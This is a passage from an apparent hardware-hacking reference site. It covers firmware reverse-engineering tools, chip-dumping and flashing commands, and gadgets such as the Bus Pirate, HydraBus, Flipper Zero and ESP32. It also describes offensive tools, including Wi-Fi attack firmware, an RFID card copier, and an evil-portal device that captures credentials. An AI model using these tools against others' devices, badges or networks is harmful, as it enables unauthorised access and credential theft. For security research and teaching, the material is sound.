executing.</li> </ul> <p>\u26a0\ufe0f For ARM Arduino firwmare the entry point is located at _RESET interruption.</p> <p>To load it properly in IDA, open the file, select ATMEL AVR and then select ATmega323_L.</p> <ul> <li>ESP8266 : https://github.com/themadinventor/ida-xtensa</li> </ul>"},{"location":"firmware/firmware-reverse-engineering/#loading-bare-metal-binaries-into-radare2","title":"Loading bare-metal binaries into Radare2","text":"<p>Radare2 can disassemble <code>avr</code>, <code>arduino</code> natively</p> <pre><code>$ radare2 -A -a arm -b 32 ihex://Challenge_v3.hex\n[x] Analyze all flags starting with sym. and entry0 (aa)\n[x] Analyze function calls (aac)\n[x] find and analyze function preludes (aap)\n[x] Analyze len bytes of instructions for references (aar)\n[x] Check for objc references\n[x] Check for vtables\n[x] Finding xrefs in noncode section with anal.in=io.maps\n[x] Analyze value pointers (aav)\n[x] Value from 0x00000000 to 0x10001018 (aav)\n[x] 0x00000000-0x10001018 in 0x0-0x10001018 (aav)\n[x] Emulate code to find computed references (aae)\n[x] Type matching analysis for all functions (aaft)\n[x] Propagate noreturn information\n[x] Use -AA or aaaa to perform additional experimental analysis.\n\n[0x565e8640]> aaaa\n[0xf7723a20]> afl\n[0xf7723a20]> e asm.describe = true\n[0xf7723a20]> s main\n[0x0804873b]> pdf\n\nTo perform a case-insensitive search for strings use /i:\n[0x0001d62c]> /i Exploding\nSearching 9 bytes in [0x0-0x10001018]\nhits: 1\n0x0003819e hit1_0 .. N# NExploding Firmware ! N.\n\n$ r2 -a avr /tmp/flash\n[0x000000c4]> afr\n[0x000000c4]> pd 17\n\n$ rasm2 -a avr -d \"0c94 751b 0c94 9d1b 0c94 d72c\" \njmp 0x36ea\njmp 0x373a\njmp 0x59ae\n</code></pre>"},{"location":"firmware/firmware-reverse-engineering/#loading-bare-metal-binaries-into-ghidra","title":"Loading bare-metal binaries into Ghidra","text":"<p>SVD-Loader for Ghidra automates the entire generation of peripheral structs and memory maps for over 650 different microcontrollers</p> <ul> <li>SVD-Loader for Ghidra: Simplifying bare-metal ARM reverse engineering - svd-loader/</li> </ul> <p>Usage</p> <ul> <li>Load a binary file</li> <li>Open it in the code-browser, do not analyze it</li> <li>Run the SVD-Loader Script</li> <li>Select an SVD file</li> <li>Analyze the file</li> </ul>"},{"location":"firmware/firmware-reverse-engineering/#esptool","title":"ESPTool","text":"<p>ESP8266 and ESP32 serial bootloader utility : espressif/esptool</p> <pre><code>josh@ioteeth:/tmp/reversing$ ~/esptool/esptool.py image_info recovered_file\nesptool.py v2.4.0-dev\nImage version: 1\nEntry point: 4010f29c\n1 segments\nSegment 1: len 0x00568 load 0x4010f000 file_offs 0x00000008\n</code></pre>"},{"location":"firmware/firmware-reverse-engineering/#nrf5x-firmware-disassembly-tools","title":"nRF5x Firmware disassembly tools","text":"<ul> <li>DigitalSecurity/nrf5x-tools</li> </ul> <pre><code>$ python3 nrfident.py bin firmwares/s132.bin\nBinary file provided firmwares/s132.bin\nComputing signature from binary\nSignature: d082a85351ee18ecfdc9dcb01352f5df3d938a2270bcadec2ec083e9ceeb3b1e\n=========================\nSDK version: 14.0.0\nSoftDevice version: s132\nNRF: nrf52832\n=========================\nSDK version: 14.1.0\nSoftDevice version: s132\nNRF: nrf52832\nSoftDevice : s132\nCard version : xxaa\n *****\nRAM address : 0x20001368\nRAM length : 0xec98\nROM address : 0x23000\nROM length : 0x5d000\n</code></pre>"},{"location":"firmware/firmware-reverse-engineering/#pure-disassemblers","title":"Pure disassemblers","text":"<ul> <li>Vavrdisasm -- vAVRdisasm will auto-recognize Atmel Generic, Intel HEX8, and Motorola S-Record files - vsergeev/vavrdisasm</li> <li>ODA - The Online Disassembler</li> <li> <p>avr-objdump \u2013 gcc kit standard tool</p> <pre><code>$ avr-objdump -l -t -D -S main.bin > main.bin.dis\n$ avr-objdump -m avr -D main.hex > main.hex.dis\n</code></pre> </li> </ul>"},{"location":"firmware/firmware-reverse-engineering/#simulating-avr","title":"Simulating AVR","text":"<p>Programs compiled for Arduino can be simulated using AVR Studio or the newer Atmel Studio. I have used the former along with hapsim. Hapsim works by hooking into AVR Studio and can simulate peripherals like the UART, LCD etc.</p> <pre><code>$ simulavr -P atmega128 -F 16000000 \u2013f build-crumbuino128/ex1.1.elf\n</code></pre>"},{"location":"firmware/firmware-reverse-engineering/#uefi-firmware","title":"UEFI Firmware","text":"<p>Parse BIOS/Intel ME/UEFI firmware related structures: Volumes, FileSystems, Files, etc - theopolis/uefi-firmware-parser</p> <pre><code>sudo pip install uefi_firmware\n$ uefi-firmware-parser --test ~/firmware/*\n~/firmware/970E32_1.40: UEFIFirmwareVolume\n~/firmware/CO5975P.BIO: EFICapsule\n~/firmware/me-03.obj: IntelME\n~/firmware/O990-A03.exe: None\n~/firmware/O990-A03.exe.hdr: DellPFS\n</code></pre>"},{"location":"firmware/firmware-reverse-engineering/#references","title":"References","text":"<ul> <li>GreHack22 - SecureDUO - chrisrdlg</li> <li>Loader un binaire Arduino dans IDA - Posted on January 26, 2014 by thanatos</li> <li>REcon 2014 - Reverse Engineering Flash Memory For Fun and Benefit - Matt Oh</li> <li>Reverse Engineering Flash Memory for Fun and Benefit - Jeong Wook (Matt) Oh</li> </ul>"},{"location":"gadgets/arduino/","title":"Arduino","text":""},{"location":"gadgets/arduino/#_1","title":"Arduino","text":"<ul> <li>Logic Analyzer for Arduino, AVR, ESP8266 and STM32 - aster94/logic-analyzer</li> <li>JTAGulator-like for Arduino, Teensy, STM32 Bluepill, Texas Instruments Tiva and RaspberryPi - cyphunk/JTAGenum</li> </ul>"},{"location":"gadgets/arduino/#references","title":"References","text":""},{"location":"gadgets/bruschetta-board/","title":"Bruschetta","text":""},{"location":"gadgets/bruschetta-board/#documentation","title":"Documentation","text":"<ul> <li>whid-injector/BRUSCHETTA-Board - The Multi-Protocol Swiss-Army-Knife for Hardware Hackers (UART/JTAG/SPI/I2C)</li> <li>whid-injector/PIZZAbite - A cheaper and open-hardware version of the blasoned Sensepeek's PCBite for Hardware Hacking and DIY Hobbyists</li> </ul> <p>Bruschetta is the latest board to interact with Hardware, it is an upgraded version of these projects.</p> <ul> <li>whid-injector/Focaccia-Board - Multipurpose Breakout for the FT232H</li> <li>whid-injector/Burtleina-Board - Yet another Multipurpose Breakout Board to hack hardware in a clean and easy way</li> <li>whid-injector/NANDo-board - 2nd Generation of Multipurpose FTDI-based board for Hardware Hacking and IoT Security Testing</li> </ul>"},{"location":"gadgets/bruschetta-board/#usage","title":"Usage","text":"<ul> <li>Mode 2 (UART1+I2C+SPI-VCP): S1=ON and S2=OFF</li> <li>Mode 4 (UART1+JTAG): S1=ON and S2=ON</li> </ul>"},{"location":"gadgets/bruschetta-board/#references","title":"References","text":"<ul> <li>\ud83c\udf55PIZZAbite & BRUSCHETTA-board: The Hardware Hacking Toolkit you need for your own Lab! \ud83c\uddee\ud83c\uddf9 - WHID - We Hack In Disguise - 28 sept. 2023</li> <li>PIZZAbite & BRUSCHETTA-board: The Hardware Hackers tools you need to kickstart your own Lab! - WHID - We Hack In Disguise - SEP 28, 2023</li> <li>Hacking IoT & RF Devices with B\u00fcrtleinaBoard\u2122 - Luca Bongiorni - Jul 27, 2020</li> </ul>"},{"location":"gadgets/bus-pirate/","title":"Bus Pirate","text":""},{"location":"gadgets/bus-pirate/#firmwares","title":"Firmwares","text":"<ul> <li>BusPirate/Bus_Pirate <pre><code>cd Bus_Pirate/package/BPv4-firmware/pirate-loader-v4-source/pirate-loader_lnx\nsudo ./pirate-loader_lnx --dev=/dev/ttyACM0 --hex=../BPv4-firmware-v6.3-r2151.hex\n</code></pre></li> </ul>"},{"location":"gadgets/bus-pirate/#examples","title":"Examples","text":"<p>Dump firmware over SPI using a Bus Pirate</p> <pre><code># Identify EEPROM chip\nsudo flashrom -p buspirate_spi:dev=/dev/ttyUSB0\n\n# Dump firmware using a bus pirate (SPI)\nsudo flashrom -p Buspirate_spi:dev=/dev/ttyUSB0,spispeed=1M -c (Chip name) -r (Name.bin)\n</code></pre>"},{"location":"gadgets/bus-pirate/#references","title":"References","text":"<ul> <li>Bus Pirate Unboxing - Toolkit - Hacker Warehouse - 4 juin 2018</li> <li>Bus Pirate 5 REV 10 Hardware</li> <li>Ph0wn, my first IoT CTF - Part 2 - Sebastien Andrivet - 19 December 2018</li> <li>Hardware Hacking: Plunder With a Bus Pirate - Brian Berg - February 15, 2024</li> </ul>"},{"location":"gadgets/ch341a/","title":"CH341A","text":""},{"location":"gadgets/ch341a/#dump-spi-flash","title":"Dump SPI flash","text":""},{"location":"gadgets/ch341a/#ch341eeprom","title":"ch341eeprom","text":"<p>https://github.com/plumbum/ch341eeprom</p> <pre><code>sudo apt install git make libusb-1.0-0-dev clang\ngit clone https://github.com/plumbum/ch341eeprom.git\nmake\n./ch341eeprom -v -s 24c05 -r dump.bin\n</code></pre>"},{"location":"gadgets/ch341a/#flashrom","title":"Flashrom","text":"<pre><code>sudo flashrom -V --programmer ch341a_spi -r dump.bin\nsudo flashrom -V --programmer ch341a_spi -r dump.bin -c W25Q16.V # Specify the chip\n</code></pre>"},{"location":"gadgets/esp32/","title":"ESP32","text":"<ul> <li>ESP32 datasheet: esp32_datasheet_en.pdf</li> <li>Xtensa\u00aeInstruction Set Architecture (ISA)</li> </ul> <p>ESP32 and ESP8266 share almost the same architecture.</p>"},{"location":"gadgets/esp32/#tools","title":"Tools","text":"<ul> <li>espressif/esptool - Espressif SoC serial bootloader utility</li> <li>jmswrnr/esp32knife - Tools for ESP32 firmware dissection</li> <li>scientifichackers/ampy - Utility to interact with a MicroPython board over a serial connection</li> <li>ESPWebTool - Flash your ESP32 or ESP8266 through your browser.</li> <li>tenable/esp32_image_parser - A toolkit for helping you reverse engineer ESP32 firmware.</li> </ul>"},{"location":"gadgets/esp32/#firmwares","title":"Firmwares","text":"<ul> <li>risinek/esp32-wifi-penetration-tool - Exploring possibilities of ESP32 platform to attack on nearby Wi-Fi networks. </li> <li>justcallmekoko/ESP32Marauder - A suite of WiFi/Bluetooth offensive and defensive tools for the ESP32 </li> </ul>"},{"location":"gadgets/esp32/#flashing","title":"Flashing","text":"<p>The ESP32 microprocessor uses the Xtensa instruction set, use <code>Tensilica Xtensa 32-bit little-endian</code> in Ghidra.</p> <ul> <li> <p>Flash a new firmware with <code>espressif/esptool</code> <pre><code>esptool.py -p /dev/ttyUSB0 -b 460800 --before default_reset --after hard_reset --chip esp32 write_flash --flash_mode dio --flash_size 2MB --flash_freq 40m 0x1000 build/bootloader/bootloader.bin 0x8000 build/partition_table/partition-table.bin 0x10000 build/ble_ctf.bin\nesptool.py -p /dev/ttyS5 -b 115200 --after hard_reset write_flash --flash_mode dio --flash_freq 40m --flash_size detect 0x8000 build/partition_table/partition-table.bin 0x1000 build/bootloader/bootloader.bin 0x10000 build/esp32-wifi-penetration-tool.bin\n</code></pre></p> </li> <li> <p>Flash a new firmware with <code>scientifichackers/ampy</code> (MicroPython) <pre><code>ampy --port /dev/ttyUSB0 put bla.py\n</code></pre></p> </li> <li> <p>Dump the flash <pre><code>esptool -p COM7 -b 115200 read_flash 0 0x400000 flash.bin\n</code></pre></p> </li> <li> <p>Dissect the flash <pre><code>python esp32knife.py --chip=esp32 load_from_file ./flash.bin\n</code></pre></p> </li> <li> <p>Flash the new firmware <pre><code># repair the checksum\npython esp32fix.py --chip=esp32 app_image ./patched.part.3.factory \nesptool -p COM7 -b 115200 write_flash 0x10000 ./patched.part.3.factory.fixed\n</code></pre></p> </li> </ul>"},{"location":"gadgets/esp32/#references","title":"References","text":"<ul> <li>ESP32-reversing - BlackVS</li> <li>ESP32 Wi-Fi Penetration Tool - GitHub - Exploring possibilities of ESP32 platform to attack on nearby Wi-Fi networks</li> <li>ESP32 Wi-Fi Penetration Tool - Documentation - Exploring possibilities of ESP32 platform to attack on nearby Wi-Fi networks</li> <li>Hacking a Smart Home Device - @jmswrnr - 03 Feb 2024</li> <li>Reversing ESP8266 Firmware (Part 1) - Bored Pentester - 26th October 2018</li> <li>Reversing ESP8266 Firmware (Part 2) - Bored Pentester - 25th October 2018</li> <li>Reversing ESP8266 Firmware (Part 3) - Bored Pentester - 25th October 2018</li> <li>Reversing ESP8266 Firmware (Part 4) - Bored Pentester - 25th October 2018</li> <li>Reversing ESP8266 Firmware (Part 5) - Bored Pentester - 25th October 2018</li> <li>Reversing ESP8266 Firmware (Part 6) - Bored Pentester - 25th October 2018</li> </ul>"},{"location":"gadgets/flipper-zero/","title":"Flipper Zero","text":""},{"location":"gadgets/flipper-zero/#firmwares","title":"Firmwares","text":"<ul> <li>Flipper Zero Firmware</li> <li>Flipper Zero Unleashed Firmware</li> <li>Flipper Zero FW RogueMaster</li> <li>Flipper Zero Xtreme-Firmware</li> <li>Flipper Zero Momentum-Firmware</li> </ul>"},{"location":"gadgets/flipper-zero/#firmware-update-pc","title":"Firmware Update - PC","text":"<ol> <li>Update to the latest firmware using https://flipperzero.one/update</li> <li>Download and install qFlipper</li> <li>Connect your Flipper Zero via USB, update to the official firmware</li> <li>Disconnect from USB, power off the Flipper Zero, and remove the SD to prepare it for flashing.</li> <li>Download the latest RogueMaster firmware from their Github Page. </li> <li>Unzip the downloaded .zip and copy the content into /update of the Flipper SD card (including the .dfu)</li> <li>On the Flipper Zero, once booted, press down, and left until you are on the 'Browser' screen. Scroll down until you see the 'update' directory and click on it.</li> <li>You should now see the contents you uploaded and an 'update' option. Hover over the 'update' option, click the center button on your Flipper, once again on the 'Run in App' option.</li> </ol>"},{"location":"gadgets/flipper-zero/#firmware-update-webupdater","title":"Firmware Update - WebUpdater","text":"<ul> <li>DarkFlippers/unleashed-firmware - Web Update</li> <li>RogueMaster/flipperzero-firmware-wPlugins - Web Update</li> </ul>"},{"location":"gadgets/flipper-zero/#gpio","title":"GPIO","text":""},{"location":"gadgets/flipper-zero/#videos","title":"Videos","text":"<ul> <li>Flipper Zero: Want some good news? - Penthertz</li> <li>Flipper Zero: is this for you? Follow our 1st tests! - Penthertz</li> <li>Flipper Zero: french collection video on the Flipper Zero, tutorial and explain</li> </ul>"},{"location":"gadgets/flipper-zero/#tutorials-and-resources","title":"Tutorials and Resources","text":"<ul> <li>Flipper Zero Hacking 101 - pingywon</li> <li>Flipper Zero Playground - UberGuidoZ</li> <li>Flashing Flipper Zero with RogueMaster CFW</li> <li>Unleashed Firmware - Update firmware</li> </ul>"},{"location":"gadgets/flipper-zero/#ioc","title":"IOC","text":"<p>MAC addresses from IEEE for Flipper Zero: <code>0C:FA:22:XX:XX:XX</code>. This applies to Bluetooth, Ethernet, WiFi interfaces.</p> <pre><code>0C-FA-22 (hex) FLIPPER DEVICES INC\n0CFA22 (base 16) FLIPPER DEVICES INC\n 2803 Philadelphia Pike Suite B #551\n Claymont 19703\n US\n</code></pre>"},{"location":"gadgets/flipper-zero/#references","title":"References","text":"<ul> <li>The Ultimate Guide / CheatSheet to Flipper Zero - Ilias Mavropoulos - 17/01/2024</li> <li>djsime1/Awesome FlipperZero - \ud83d\udc2c A collection of awesome resources for the Flipper Zero device</li> <li>Reading NFC cards - Flipper Docs</li> </ul>"},{"location":"gadgets/goodfet/","title":"GoodFET","text":"<ul> <li>travisgoodspeed/goodfet - An embedded bus adapter for various microcontrollers and radios.</li> <li>greatscottgadgets/Facedancer - modern FaceDancer core for multiple devices-- including GreatFET</li> </ul>"},{"location":"gadgets/goodfet/#facedancer","title":"Facedancer","text":"<p>The Facedancer21 is the twenty-fourth hardware revision of the GoodFET, owing its heritage to the GoodFET41 and Facedancer20. Unlike the general-purpose GoodFET boards, the only purpose of this board is to allow USB devices to be written in host-side Python, so that one workstation can fuzz-test the USB device drivers of another host. </p>"},{"location":"gadgets/goodfet/#references","title":"References","text":"<ul> <li>GoodFET</li> <li>Facedancer21 - GoodFET</li> <li>Black Hat USA 2016 GreatFET Making GoodFET Great Again - 5 oct. 2019</li> </ul>"},{"location":"gadgets/hydrabus/","title":"HydraBus","text":""},{"location":"gadgets/hydrabus/#features","title":"Features","text":"<p>Support many extensions:</p> <ul> <li>HydraNFC - Hydrabus shield for NFC</li> <li>HydraFlash - NAND flash shield</li> <li>HydraLINCAN - Hydrabus shield for LIN and CAN buses</li> </ul> <p>External interactions:</p> <ul> <li>Bus interaction commands</li> <li>Trigger mode</li> <li>ADC guide</li> <li>DAC guide</li> <li>PWM guide</li> <li>GPIO guide</li> <li>SPI guide / binary mode</li> <li>I2C guide / binary mode</li> <li>1-wire guide / binary mode</li> <li>2-wire guide</li> <li>3-wire guide</li> <li>UART guide / binary mode</li> <li>CAN guide / binary mode</li> <li>JTAG guide</li> <li>NAND Flash guide / binary mode</li> <li>Wiegand guide</li> <li>LIN guide</li> <li>SMARTCARD guide / binary mode</li> <li>NFC guide / binary mode</li> </ul>"},{"location":"gadgets/hydrabus/#firmware","title":"Firmware","text":"<ul> <li>hydrabus/hydrafw - HydraFW official firmware for HydraBus/HydraNFC</li> <li>hydrabus/hydrafw_hydranfc_shield_v2 - HydraFW dedicated to HydraBus v1 / HydraNFC Shield v2</li> <li>bvernoux/blackmagic - In application debugger for ARM Cortex microcontrollers</li> </ul>"},{"location":"gadgets/hydrabus/#firmware-update","title":"Firmware Update","text":"<p>Detailed steps: hydrafw/Getting-Started-with-HydraBus-flash-and-use-hydrafw-on-linux</p> <ol> <li> <p>Install <code>dfu-util</code> <pre><code>git clone git://git.code.sf.net/p/dfu-util/dfu-util dfu-util\ncd dfu-util\n./autogen.sh\n./configure\nsudo make install\n</code></pre></p> </li> <li> <p>Download the latest release of the firmware <pre><code>wget https://github.com/hydrabus/hydrafw/releases/download/v0.11/build_HydraFW_v0.11-12-ga6019f4_HydraBus_HydraNFC.zip\nwget https://raw.githubusercontent.com/hydrabus/hydrafw/master/utils/udev-rules/09-hydrabus.rules -O ~/hydrafw/09-hydrabus.rules\n</code></pre></p> </li> <li> <p>Keep pressing <code>UBTN</code> button at <code>PowerON/RESET</code> in order to enter <code>USB DFU</code></p> </li> <li>Connect the MicroUSB cable from your PC to HydraBus</li> <li>Check Linux detection for HydraBus in DFU mode: <code>sudo dfu-util -l</code></li> <li>Flash the firmware: <code>sudo dfu-util -i 0 -a 0 -d 0483:df11 -D ./build/hydrafw.dfu</code></li> </ol>"},{"location":"gadgets/hydrabus/#commands","title":"Commands","text":"<ul> <li> <p>Basic info: <code>show system</code></p> <p><code>ps1> show system HydraFW (HydraBus) v0.11-1-g4d74500 2023-05-09 sysTime: 0x000d82dd. cyclecounter: 0x76ac02b9 cycles. cyclecounter64: 0x0000000076ac02cb cycles. 10ms delay: 1680035 cycles.</code></p> </li> <li> <p>Determine the port name: <code>ls -l /dev/tty*</code></p> </li> <li>Interact witht the HydraBus: <code>screen /dev/ttyACM0</code></li> <li>Switch to SPI mode: <code>spi</code></li> <li>Determine the pin for SPI: <code>show pins</code></li> </ul>"},{"location":"gadgets/hydrabus/#syntax","title":"Syntax","text":"Value Description [ Chip select (CS) active (low) ] CS disable (high) r Read one byte by sending dummy byte (0xff). r:1...255 for bulk reads hd Read one byte by sending dummy byte (0xff). hd:1...4294967295 for bulk reads. Displays a hexdump of the result w Followed by values to write byte(s). w:1...255 for bulk writes 0b Write this binary value. Format is 0b00000000 for a byte, but partial bytes are also fine: 0b1001 0 Write this Octal value. Format is prefixed by a 0 (values from 000 to 077) \" Write an ASCII-encoded string 0h/0x Write this HEX value. Format is 0h01 or 0x01. Partial bytes are fine: 0xA. A-F can be lower-case or capital letters 0-255 Write this decimal value. Any number not preceded by 0x, 0h, or 0b is interpreted as a decimal value <p>Examples:</p> <ul> <li>Read Identification (0x9F): <code>[ 0x9F r:3 ]</code></li> <li>Read Data (0x03) at the address (0x00:3) and read 32 bytes (hd:32) <code>[ 0x03 0x00:3 hd:32 ]</code></li> </ul>"},{"location":"gadgets/hydrabus/#references","title":"References","text":"<ul> <li>HydraBus/HydraFW wiki - Benjamin Vernoux - Jan 21, 2021</li> <li>HydraBus v1.0 Specifications - HydraBus</li> <li>HydraBus Assembly Video - Lab401 - 30 may 2017</li> <li>BlackAlps17: Hydrabus: Lowering the entry fee to the IoT bugfest - Benjamin Vernoux - 2 dec. 2017</li> <li>HydraBus - An Open Source Platform - RMLL Sec 2017</li> <li>Ph0wn, my first IoT CTF - Part 3 - Sebastien Andrivet - Dec. 19, 2018</li> <li>Getting Started with HydraBus flash and use hydrafw on linux - Benjamin Vernoux - 05/02/2024</li> </ul>"},{"location":"gadgets/hydraflash/","title":"HydraFlash","text":"<p>Designed to dump Flash NAND chips</p>"},{"location":"gadgets/hydraflash/#usage","title":"Usage","text":"<ul> <li>hydrabus/DumpFlash-Hydrabus <pre><code>pip install git+https://github.com/hydrabus/DumpFlash-Hydrabus\npython2 DumpFlash.py -d /dev/hydrabus -i\n</code></pre></li> </ul>"},{"location":"gadgets/hydraflash/#references","title":"References","text":"<ul> <li>Hydrabus NAND Flash shield - hydrabus/HydraFlash</li> </ul>"},{"location":"gadgets/hydranfc/","title":"HydraNFC","text":""},{"location":"gadgets/hydranfc/#features","title":"Features","text":"<ul> <li>Support of microSD (FAT16/FAT32) card up to 32GB</li> <li>Virtual Serial Port access through micro USB with VT100 terminal/shell</li> <li>Basic UID read for Vicinity/ISO15693</li> <li>Basic UID read for ISO14443-A/MIFARE \u00ae card 4 or 7bytes UID</li> <li>Read MIFARE Ultralight\u00ae tag content (full dump)</li> <li>Tag Emulation UID ISO14443A & MIFARE Classic\u00ae 1K</li> <li>Sniffer mode in an autonomous/stand-alone mode</li> <li>Real-time ISO14443A sniffer mode</li> </ul>"},{"location":"gadgets/hydranfc/#firmware","title":"Firmware","text":"<ul> <li>hydrabus/hydrafw_hydranfc_shield_v2 - HydraFW dedicated to HydraBus v1 / HydraNFC Shield v2</li> </ul> <p>Using console, type <code>nfc</code> + <code>Enter</code> to enter NFC mode dedicated to HydraNFC Shield v2.</p> <pre><code>> nfc\nNFCv2> nfc-all\nNFCv2> show\nNFCv2> nfc-all scan\n</code></pre>"},{"location":"gadgets/hydranfc/#references","title":"References","text":"<ul> <li>HydraFW HydraNFC v2 guide - Benjamin Vernoux - Jul 4, 2021</li> <li>HydraNFC Getting Started - Lab401 - 30 mai 2017</li> <li>HydraBus / HydraNFC unboxing & Assembly - Lab401 - 30 mai 2017</li> <li>HydraNFC - LAB401 product presentation - 17 mai 2018</li> </ul>"},{"location":"gadgets/hydrausb3/","title":"HydraUSB3","text":"<p>HydraUSB3 (WCH CH569) open source test firmware / examples / libraries to experiment with streaming / high-speed protocols (USB2 HS, USB3 SS, HSPI, SerDes...)</p> <p></p> <ul> <li>hydrausb3/hydrausb3_fw - Firmware</li> <li>hydrausb3/hydrausb3_hw - Hardware documentation</li> </ul> <p>Warning It is MANDATORY to buy a \u201cUSB 3 Type A male to USB 3 Type A male cable\u201d (the cable shall have Power+Data with USB2 and USB3 SS signals)</p>"},{"location":"gadgets/hydrausb3/#firmware-flashing","title":"Firmware Flashing","text":"<p>Linux</p> <ul> <li>How to build flash and use examples on Linux with shell</li> <li>How to build flash and use examples on Linux with Eclipse IDE</li> </ul> <p>Windows (requires MSYS2/MINGW64)</p> <ul> <li>How to build flash and use examples on Windows with MSYS2/MINGW64 shell</li> <li>How to build flash and use examples on Windows with Eclipse IDE</li> </ul>"},{"location":"gadgets/hydrausb3/#references","title":"References","text":"<ul> <li>HydraUSB3 v1.0 Specifications - HydraBus</li> <li>GreHack2022 - Reverse Engineering of advanced RISC-V MCU with USB3 & High Speed peripherals - Benjamin Vernoux</li> <li>GreHack22 - SecureDUO</li> <li>WCH CH569 SerDes Reverse Engineering - hydrausb3</li> </ul>"},{"location":"gadgets/icopy-x/","title":"iCopy-X","text":"<p>iCopy-X is a \"super\" automated handheld RFID copier based on Proxmark3. iCopy-X can read, crack, duplicate, sniff and simulate without the use of a PC.</p> <ul> <li>iCopy-X-Community<ul> <li>iCopy-X-Community/icopyx-upstream - Collecting elements provided by the manufacturer</li> <li>iCopy-X-Community/icopyx-community-pm3 - Scrap repo for various tests</li> <li>iCopy-X-Community/icopyx-teardown</li> </ul> </li> </ul>"},{"location":"gadgets/icopy-x/#update","title":"Update","text":"<p>Latest firmware: <code>1.0.90 2022-08-16</code></p> <ul> <li>icopy-x.com/otasys</li> </ul> <p>Step 1: Enter the device S/N (found under the \u201cAbout\u201d menu) on the website and download the upgrade package to your PC.</p> <p>Step 2: Connect the iCopy-X to your computer using the supplied USB TYPE C cable and delete any files that end in \u201c.ipk\u201d from the root directory.</p> <p>Step 3: Copy the newly downloaded upgrade package to the root directory.</p> <p>Step 4: Press \"Ok\" on the second page of the \"About\" menu on the iCopy-X to start the automatic upgrade.</p> <p>TIP: Ensure that the serial number has been entered correctly before starting as this could cause the upgrade to fail.</p>"},{"location":"gadgets/icopy-x/#pc-mode","title":"PC Mode","text":"<p>In PC-Mode, after connecting to the computer, open the client in the built-in U disk, you can directly use the Proxmark3 universal CMD to operate.</p> <pre><code>COM Port (Check Device Manager, numbers only): 4\n[=] Session log E:/CLIENT_X86/.proxmark3/logs/log_20240730.txt\n[+] loaded from JSON file E:/CLIENT_X86/.proxmark3/preferences.json\n[=] Using UART port /com4\n[=] Communicating with PM3 over USB-CDC\n[usb] pm3 -->\n</code></pre>"},{"location":"gadgets/icopy-x/#references","title":"References","text":"<ul> <li>iCopy-X - Kickstarter - iCopy-X: Handheld Smart RFID Multi-Tool - Nikola T. Lab</li> <li>icopy-x Official Website</li> </ul>"},{"location":"gadgets/logic-analyzer/","title":"Logic Analyzer","text":""},{"location":"gadgets/logic-analyzer/#sigrok-pulseview","title":"Sigrok / Pulseview","text":"<ul> <li>Sigrok wiki > Downloads <pre><code>sigrok/kali-rolling 0.3 all\nLogic analyzer and protocol decoder software suite (metapackage)\n\npulseview/kali-rolling 0.4.2-3+b1 amd64\nsigrok logic analyzer, oscilloscope, and MSO GUI\n</code></pre></li> </ul>"},{"location":"gadgets/logic-analyzer/#saleae","title":"Saleae","text":"<ul> <li>Logic 2 Software</li> </ul>"},{"location":"gadgets/logic-analyzer/#interact","title":"Interact","text":"<pre><code>screen /dev/ttyUSB0 19200\n</code></pre>"},{"location":"gadgets/logic-analyzer/#references","title":"References","text":"<ul> <li>LOGIC ANALYZERS: TAPPING INTO RASPBERRY PI SECRETS - Arya Voronova - August 31, 2023</li> <li>LOGIC ANALYZERS: CAPABILITIES AND LIMITATIONS - Arya Voronova - September 12, 2023</li> </ul>"},{"location":"gadgets/m5stack/","title":"Evil M5Core2","text":"<p>Evil-M5Core2 is an easy Evil portal and rogue app deployement software designed to work on M5Stack Core2.</p> <p></p>"},{"location":"gadgets/m5stack/#features","title":"Features","text":"<ul> <li>WiFi Network Scanning: Identify and display nearby WiFi networks.</li> <li>Network Cloning: Check information and replicate networks for in-depth analysis.</li> <li>Captive Portal Management: Create and operate a captive portal to prompt users with a page upon connection.</li> <li>Credential Handling: Capture and manage portal credentials.</li> <li>Remote Web Server: Monitor the device remotely via a simple web interface that can provide credentials and upload portal that store file on SD card.</li> <li>Sniffing probes: Sniff and store on SD near probes.</li> <li>Karma Attack: Try a simple Karma Attack on a captured probe.</li> <li>Automated Karma Attack: Try Karma Attack on near probe automatically</li> </ul>"},{"location":"gadgets/m5stack/#firmwares","title":"Firmwares","text":"<ul> <li>Firmware: 7h30th3r0n3/Evil-M5Core2</li> </ul> <p>Requirements:</p> <ul> <li><code>M5Stack</code> boards manager</li> <li><code>M5Unified</code> library</li> </ul> <p>Install:</p> <ul> <li>Connect your <code>M5Core2</code> to your computer.</li> <li>Open the <code>Arduino IDE</code> and load the provided code.</li> <li>Ensure <code>M5unified</code> and <code>adafruit_neopixel</code> libraries are installed.</li> <li>Ensure <code>esp32</code> and <code>M5stack</code> board are installed. (Error occur with esp32 <code>3.0.0-alpha3</code>, please use esp32 <code>v2.0.14</code> and below)</li> <li>Place SD file content needed on the SD card. (IMG startup and sites folder)</li> <li>Upload the script to your <code>M5Core2</code> device.</li> <li>Restart the device if needed.</li> </ul>"},{"location":"gadgets/m5stack/#references","title":"References","text":"<ul> <li>Evil-M5Core2 v1.1.3 - Serial Command - Github Project</li> <li>Evil Portal Meets Marauder on M5Stack!! Evil-M5Core2 Is the Best of Both Worlds! - Talking Sasquach - 7 jan 2024</li> </ul>"},{"location":"gadgets/memory-programmer/","title":"Memory Programmer","text":"<p>RT809H with multiple adapters/sockets for eMMC/NAND Flash</p>"},{"location":"gadgets/micro-bit/","title":"Micro::bit","text":""},{"location":"gadgets/micro-bit/#extract-source-code-from-firmware","title":"Extract source code from firmware","text":"<p>When the source has been build from https://makecode.microbit.org/#editor, the Javascript code is embedded into the firmware.</p> <pre><code>import bincopy\nimport lzma\nimport sys\nimport subprocess\nimport json\n\n# split firmware into raw and code\nwith open(sys.argv[1],'r') as f:\n fwstring = f.read()\n fwsplit = fwstring.split('\\n\\n')\n\n with open('fw_raw.hex', 'w') as g:\n g.write(fwsplit[0])\n with open('fw_code.hex', 'w') as g:\n g.write(fwsplit[1])\n\n# Convert ihex to bin\nf = bincopy.BinFile()\nf.add_ihex_file('fw_code.hex')\nbinary = f.as_binary()\nprint(\"[+] ihex converted to binary\")\n\n## Extract code firmware, bruteforce offset\nfor i in range(200):\n with open('firmware.bin', 'w+b') as g:\n g.write(binary[i:])\n\n try:\n data = subprocess.run([\"lzma\", \"firmware.bin\", \"-d\", \"--stdout\"], capture_output=True)\n data = data.stdout.decode().split('}',1)\n data = data[1][1:]\n data = json.loads(data)\n print(data)\n print(\"\\n[+] Javascript code\")\n print(data['main.ts'])\n except Exception as e:\n continue\n</code></pre>"},{"location":"gadgets/micro-bit/#extract-firmware-using-swd","title":"Extract firmware using SWD","text":""},{"location":"gadgets/micro-bit/#connection","title":"Connection","text":"<p>Solder wires on SWD 